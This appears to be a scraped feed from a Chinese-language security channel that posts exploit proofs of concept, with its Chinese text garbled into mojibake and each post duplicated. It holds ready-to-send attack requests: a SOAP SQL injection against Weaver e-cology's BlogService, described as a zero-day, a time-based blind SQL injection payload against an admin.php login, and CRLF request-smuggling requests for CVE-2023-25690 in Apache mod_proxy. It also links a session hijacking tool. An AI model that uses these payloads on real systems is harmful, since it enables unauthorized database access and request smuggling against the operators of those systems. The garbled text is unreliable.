ecologyๆๆฅๅฃ sqlๆณจๅ
ฅ 0day poc
POST /services/BlogService HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:writeBlogReadFlag>
<web:string>1</web:string>
<web:string>ๆณจๅ ฅ็น</web:string>
<web:string></web:string>
</web:writeBlogReadFlag>
</soapenv:Body>
</soapenv:Envelope>
POST /services/BlogService HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:writeBlogReadFlag>
<web:string>1</web:string>
<web:string>ๆณจๅ ฅ็น</web:string>
<web:string></web:string>
</web:writeBlogReadFlag>
</soapenv:Body>
</soapenv:Envelope>
๐6โค2
ไธญ่ฟ้บ้บๅ กๅๆบๅญๅจSQLๆณจๅ
ฅๆผๆดๆผpoc
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
โค4๐3
CVE 2023 25690 ๆฆๅฟต้ช่ฏ - Apache HTTP Server ็ๆฌ 2.4.0 - 2.4.55 ไธ็ mod_proxy ๆๅๆปๅป็้
็ฝฎไผๅฏผ่ด HTTP ่ฏทๆฑ่ตฐ็งๆผๆด
โ ๏ธ CVE-2023-25690 ( POC )
- Apache HTTP Server mod_proxy
CLRF Injection
GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host:
Header Injection
GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: 1.1.1.1
GitHub URL : https://github.com/dhmosfunk/CVE-2023-25690-POC
โ ๏ธ CVE-2023-25690 ( POC )
- Apache HTTP Server mod_proxy
CLRF Injection
GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host:
Header Injection
GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: 1.1.1.1
GitHub URL : https://github.com/dhmosfunk/CVE-2023-25690-POC
GitHub
GitHub - dhmosfunk/CVE-2023-25690-POC: CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Serverโฆ
CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability. - dhmosfunk/CVE-2023-25690-POC
โค8๐3
Session Hijacking Visual Exploitation
ไผ่ฏๅซๆๅฏ่งๅๅฉ็จๅทฅๅ ท
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
ไผ่ฏๅซๆๅฏ่งๅๅฉ็จๅทฅๅ ท
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
โค4